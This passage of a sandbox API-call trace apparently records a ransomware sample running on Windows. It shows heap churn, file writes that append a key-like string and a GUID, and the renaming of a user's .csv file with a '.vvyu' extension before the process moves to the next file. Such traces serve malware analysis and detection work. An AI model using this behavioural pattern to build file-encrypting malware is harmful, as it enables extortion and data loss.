lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0196.668] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2f90 [0196.668] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2f30 | out: hHeap=0x620000) returned 1 [0196.668] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2f30 [0196.668] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2f48 | out: hHeap=0x620000) returned 1 [0196.668] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78aa0 [0196.668] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0196.668] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0196.668] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0196.668] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83b60 [0196.668] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2f00 | out: hHeap=0x620000) returned 1 [0196.669] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2f00 [0196.669] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0196.669] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2d08630 [0196.669] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2f60 | out: hHeap=0x620000) returned 1 [0196.669] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99d28 [0196.669] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2f90 | out: hHeap=0x620000) returned 1 [0196.669] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea6a68 [0196.669] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83b60 | out: hHeap=0x620000) returned 1 [0196.669] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99c10 [0196.669] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0196.669] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99af8 [0196.669] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2f00 | out: hHeap=0x620000) returned 1 [0196.669] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea6c80 [0196.669] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0196.670] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0196.670] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0196.670] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0196.670] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0196.671] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0196.671] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0196.671] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0196.671] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0196.672] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6c80 | out: hHeap=0x620000) returned 1 [0196.672] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0196.672] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0196.672] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2f30 | out: hHeap=0x620000) returned 1 [0196.672] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0196.672] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2f78 | out: hHeap=0x620000) returned 1 [0196.672] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0196.672] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2f18 | out: hHeap=0x620000) returned 1 [0196.672] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ee8 | out: hHeap=0x620000) returned 1 [0196.673] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a80 | out: hHeap=0x620000) returned 1 [0196.673] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0196.673] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0196.673] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ed0 | out: hHeap=0x620000) returned 1 [0196.673] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea19b0 | out: hHeap=0x620000) returned 1 [0196.674] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d08630 | out: hHeap=0x620000) returned 1 [0196.674] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0196.674] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0196.675] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0196.675] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0196.675] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0196.675] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0196.675] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a670 | out: hHeap=0x620000) returned 1 [0196.676] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0196.676] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0196.676] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0196.676] WriteFile (in: hFile=0x568, lpBuffer=0x2ea79b0*, nNumberOfBytesToWrite=0xeaea, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea79b0*, lpNumberOfBytesWritten=0x312fb14*=0xeaea, lpOverlapped=0x0) returned 1 [0196.677] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea79b0 | out: hHeap=0x620000) returned 1 [0196.677] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0xeaef, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0196.678] WriteFile (in: hFile=0x568, lpBuffer=0x2e95c90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95c90*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0196.678] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0196.678] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb45f0 [0196.678] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea6a68 [0196.678] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea6a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0196.678] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea6e98 [0196.679] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0196.679] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb45f0 | out: hHeap=0x620000) returned 1 [0196.679] WriteFile (in: hFile=0x568, lpBuffer=0x2ea6e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea6e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0196.679] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6e98 | out: hHeap=0x620000) returned 1 [0196.679] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0196.679] WriteFile (in: hFile=0x568, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0196.679] CloseHandle (hObject=0x568) returned 1 [0196.681] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cf30 [0196.681] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x880) returned 0x2ea6a68 [0196.681] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cf30 | out: hHeap=0x620000) returned 1 [0196.682] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\hhuy\\z99M8Y1GRoOyuotMz.csv" (normalized: "c:\\users\\keecfmwgj\\documents\\hhuy\\z99m8y1grooyuotmz.csv"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\hhuy\\z99M8Y1GRoOyuotMz.csv.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\hhuy\\z99m8y1grooyuotmz.csv.vvyu")) returned 1 [0196.683] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0196.683] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0196.683] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0196.686] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6a53e0 | out: hHeap=0x620000) returned 1 [0196.686] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x15b2a0b0, ftCreationTime.dwHighDateTime=0x1d89bdf, ftLastAccessTime.dwLowDateTime=0x5545ada0, ftLastAccessTime.dwHighDateTime=0x1d89cf5, ftLastWriteTime.dwLowDateTime=0x5545ada0, ftLastWriteTime.dwHighDateTime=0x1d89cf5, nFileSizeHigh=0x0, nFileSizeLow=0xeaef, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="z99M8Y1GRoOyuotMz.csv", cAlternateFileName="Z99M8Y~1.CSV")) returned 0 [0196.686] FindClose (in: hFindFile=0x2cfe100 | out: hFindFile=0x2cfe100) returned 1 [0196.686] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0196.686] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaf50 | out: hHeap=0x620000) returned 1 [0196.686] PeekMessageW (in: lpMsg=0x312ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312ff08) returned 0 [0196.686] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaf50 [0196.686] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0196.686] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0196.686] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0196.687] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0196.687] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0196.687] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0196.687] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0196.687] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0196.688] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0196.688] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0196.688] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0196.688] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0196.688] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0196.688] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0196.688] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0196.689] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0196.689] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0196.689] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0196.689] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0196.689] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0196.690] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0196.690] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0196.690] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0196.690] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0196.690] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0196.690] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0196.690] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0196.690] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e902a8 [0196.691] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0196.691] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0196.691] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0196.691] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0196.691] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0196.692] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0196.692] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0196.692] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0196.692] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0196.692] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0196.693] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0196.693] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0196.693] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0196.693] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0196.693] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0196.693] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0196.693] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0196.694] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0196.694] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0196.694] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0196.694] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0196.694] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0196.695] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0196.695] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0196.695] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0196.695] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0196.695] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0196.695] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0196.695] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0196.696] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0196.696] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0196.696] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0196.696] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0196.696] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0196.697] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0196.697] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0196.697] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0196.697] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0196.698] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0196.698] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0196.698] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0196.698] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0196.698] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0196.698] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0196.698] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0196.699] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0196.699] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0196.699] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0196.699] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0196.699] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0196.700] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0196.700] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0196.700] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0196.700] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0196.700] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0196.701] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0196.701] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0196.701] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0196.701] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0196.701] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0196.701] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0196.702] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0196.702] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0196.702] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0196.702] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0196.702] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0196.702] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0196.703] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0196.703] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0196.703] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0196.703] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0196.703] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0196.704] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0196.704] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0196.704] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0196.704] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e902a8 [0196.704] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0196.705] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0196.705] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0196.705] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0196.705] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0196.705] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0196.706] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0196.706] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0196.706] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0196.706] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0196.707] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0196.707] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0196.707] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0196.707] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0196.707] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0196.707] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0196.707] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0196.708] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0196.708] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0196.708] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0196.708] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0196.708] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0196.708] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0196.709] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0196.709] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0196.709] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0196.709] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0196.709] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0196.710] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0196.710] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0196.710] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0196.710] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0196.710] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0196.710] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0196.710] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0196.711] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0196.711] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 